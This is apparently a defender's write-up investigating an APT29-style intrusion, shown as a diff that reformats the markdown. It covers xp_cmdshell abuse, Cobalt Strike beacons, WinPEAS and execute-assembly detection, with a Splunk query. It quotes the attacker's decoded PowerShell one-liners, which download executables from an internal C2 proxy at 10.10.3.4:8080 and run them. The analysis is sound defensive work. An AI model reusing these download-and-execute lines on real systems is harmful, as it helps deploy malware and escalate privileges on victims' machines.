Investigating APT29 Exploiting TeamCity CVE-2024-27198

 | sort + _time

-Encoded PowerShell usage detection across the environment
+<figure><img src="/files/LlAeJcTlWjETp7tazJUL" alt=""><figcaption><p>Encoded PowerShell usage detection across the environment</p></figcaption></figure>

-At 16:55:59, just 20 seconds after xp_cmdshell was enabled (16:55:39), I observed multiple xp_cmdshell executions spawning cmd.exe under sqlservr.exe (the MSSQL process).
-These commands deployed a new Cobalt Strike beacon named smss32.exe using a Base64-encoded PowerShell command.
-The beacon successfully launched at 17:06:27.
+At `16:55:59`, just 20 seconds after `xp_cmdshell` was enabled (`16:55:39`), I observed multiple `xp_cmdshell` executions spawning `cmd.exe` under `sqlservr.exe` (the MSSQL process).
+These commands deployed a new Cobalt Strike beacon named `smss32.exe` using a Base64-encoded PowerShell command.
+The beacon successfully launched at `17:06:27`.

 (New-Object System.Net.WebClient).DownloadFile('http://10.10.3.4:8080/smss32.exe', 'C:\Windows\Temp\smss32.exe'); Start-Process 'C:\Windows\Temp\smss32.exe'

-By decoding the command, I observed that smss32.exe was downloaded and executed under NT SERVICE\MSSQL$SQLEXPRESS.
-This aligns with the fact I mentioned earlier, that any OS-level command executed through xp_cmdshell inherits the SQL Server service account’s context.
+By decoding the command, I observed that `smss32.exe` was downloaded and executed under `NT SERVICE\MSSQL$SQLEXPRESS`.
+This aligns with the fact I mentioned earlier, that any OS-level command executed through `xp_cmdshell` inherits the SQL Server service account’s context.
 Because this account has limited privileges (no administrative access), I expected that the threat actor would escalate their privileges to proceed with their attack.

-Additionally, this command reinforced my earlier hypothesis that Sense.exe on JB01 (10.10.3.4) was proxying all traffic over port 8080 to the attacker’s C2.
+Additionally, this command reinforced my earlier hypothesis that `Sense.exe` on JB01 (`10.10.3.4`) was proxying all traffic over port `8080` to the attacker’s C2.
 By tunneling the beacon's traffic through JB01, the threat actor consolidated their C2 activities and minimized direct connections from the compromised machines to the external network.

-Privilege Escalation
+### Privilege Escalation

-After successfully gaining an initial foothold on the SQL server, I observed the attacker downloading the WinPEAS tool from GitHub (T1105), which is commonly used to identify potential privilege escalation paths in Windows environments.
-The threat actor renamed the file to peas.exe before running it.
+After successfully gaining an initial foothold on the SQL server, I observed the attacker downloading the [WinPEAS tool](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) from GitHub ([T1105](https://attack.mitre.org/techniques/T1105/)), which is commonly used to identify potential privilege escalation paths in Windows environments.
+The threat actor renamed the file to `peas.exe` before running it.

 (New-Object Net.WebClient).DownloadFile('https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64_ofs.exe', 'C:\Windows\Temp\peas.exe')

-At 17:11:30, WinPEAS was executed using a Base64-encoded PowerShell with the -lolbas flag.
+At `17:11:30`, WinPEAS was executed using a Base64-encoded PowerShell with the `-lolbas` flag.
 This parameter scans for LOLBAS and other exploitable escalation paths.

-WinPeas execution and -lolbas option usage
+<figure><img src="/files/E3PsA1Mxk3qe4DFSkmkG" alt=""><figcaption><p>WinPeas execution and -lolbas option usage</p></figcaption></figure>

-Shortly afterward, at 17:20:21, I observed the download and execution of smss64.exe with rundll32.exe as a parent process.
+Shortly afterward, at `17:20:21`, I observed the download and execution of `smss64.exe` with `rundll32.exe` as a parent process.&#x20;

 (New-Object System.Net.WebClient).DownloadFile('http://10.10.3.4:8080/smss64.exe', 'C:\Windows\Temp\smss64.exe'); Start-Process 'C:\Windows\Temp\smss64.exe'

-By 17:21:27, smss64.exe was successfully executed under NT AUTHORITY\SYSTEM context, which is clear evidence that the threat actor has successfully escalated their privileges.
+By `17:21:27`, `smss64.exe` was successfully executed under `NT AUTHORITY\SYSTEM` context, which is clear evidence that the threat actor has successfully escalated their privileges.

-First smss64.exe execution showing privilege escalation
+<figure><img src="/files/9Td5qL7NIoIdRLB7RrSl" alt=""><figcaption><p>First smss64.exe execution showing privilege escalation</p></figcaption></figure>

-So, how did the attacker manage to escalate their privileges?
+#### **So, how did the attacker manage to escalate their privileges?**&#x20;

 First, I thought it was something related to WinPEAS finding privilege escalation vulnerabilities, but it appeared not to be the case.

-In many cases, Microsoft SQL Express services (NT SERVICE\MSSQL$SQLEXPRESS) is misconfigured to run under local service accounts with privileges like SeImpersonatePrivilege, which is a common misconfiguration that attackers exploit for privilege escalation (e.g., Potato family exploits).
-Since the threat actor was using Cobalt Strike with its default profile, and the fact smss64.exe was started via rundll32.exe, I hypothesized they likely used execute-assembly feature in Cobalt Strike.
+In many cases, Microsoft SQL Express services (`NT SERVICE\MSSQL$SQLEXPRESS`) is misconfigured to run under local service accounts with privileges like `SeImpersonatePrivilege`, which is a common misconfiguration that attackers exploit for privilege escalation (e.g., Potato family exploits).
+Since the threat actor was using Cobalt Strike with its default profile, and the fact `smss64.exe` was started via `rundll32.exe`, I hypothesized they likely used `execute-assembly` feature in Cobalt Strike.

-Cobalt Strike’s execute-assembly allows .NET binaries execution in memory, bypassing traditional defenses.
-It typically works by spawning a sacrificial process (e.g.,dllhost.exe, rundll32.exe or whatever is defined in the malleable C2 profile's spawnto configuration) and then loads the .NET CLR (Common Language Runtime).
+Cobalt Strike’s `execute-assembly` allows .NET binaries execution in memory, bypassing traditional defenses.
+It typically works by spawning a sacrificial process (e.g.,`dllhost.exe`, `rundll32.exe` or whatever is defined in the malleable C2 profile's `spawnto` configuration) and then loads the .NET CLR (Common Language Runtime).

-Detecting Cobalt Strike execute-assembly
+### Detecting Cobalt Strike `execute-assembly`

-To validate my hypothesis regarding .NET in-memory execution, I searched the logs (just before smss64.exe was downloaded and executed) for processes loading clr.dll, clrjit.dll, mscoree.dll, and mscorlib.dll but not linked to typical .NET applications.
-This detection approach was described by MDSec in their article “Detecting and Advancing In-Memory .NET Tradecraft” and MITRE ATT&CK detection (DS0011) under the "T1620: Reflective Code Loading" technique.
+To validate my hypothesis regarding .NET in-memory execution, I searched the logs (just before `smss64.exe` was downloaded and executed) for processes loading `clr.dll`, `clrjit.dll`, `mscoree.dll`, and `mscorlib.dll` but not linked to typical .NET applications.
+This detection approach was described by **MDSec** in their article “[Detecting and Advancing In-Memory .NET Tradecraft](https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/)” and MITRE ATT\&CK detection ([DS0011](https://attack.mitre.org/datasources/DS0011)) under the "[T1620: Reflective Code Loading](https://attack.mitre.org/techniques/T1620/)" technique.

-MDSec: Detecting and Advancing In-Memory .NET Tradecraft
+<figure><img src="/files/ERWSzvhTVCZhzaA7w1P9" alt=""><figcaption><p>MDSec: Detecting and Advancing In-Memory .NET Tradecraft</p></figcaption></figure>

-DS0011: Detecting Cobalt T1620 (Reflective Code Loading)
+<figure><img src="/files/yiW2nNlMf8k8HEU4qhH0" alt=""><figcaption><p>DS0011: Detecting Cobalt T1620 (Reflective Code Loading) </p></figcaption></figure>

-By focusing on the MSSQL$SQLEXPRESS service account and modules linked to the .NET CLR, I found rundll32.exe loading clr.dll, clrjit.dll, and mscoree.dll twice under NT SERVICE\MSSQL$SQLEXPRESS, once at 17:19:42 and again at 17:20:20.
-This behavior is abnormal, as rundll32.exe typically doesn’t load .NET assemblies unless explicitly directed to do so.
+By focusing on the `MSSQL$SQLEXPRESS` service account and modules linked to the .NET CLR, I found `rundll32.exe` loading `clr.dll`, `clrjit.dll`, and `mscoree.dll` twice under `NT SERVICE\MSSQL$SQLEXPRESS`, once at `17:19:42` and again at `17:20:20`.
+This behavior is abnormal, as `rundll32.exe` typically doesn’t load .NET assemblies unless explicitly directed to do so.

 index=main host=sql User="*MSSQL$SQLEXPRESS*" EventCode=7 Image=*rundll32.exe (ImageLoaded=*clr.dll OR ImageLoaded=*clrjit.dll OR ImageLoaded=*mscoree.dll OR ImageLoaded=*mscor.dll)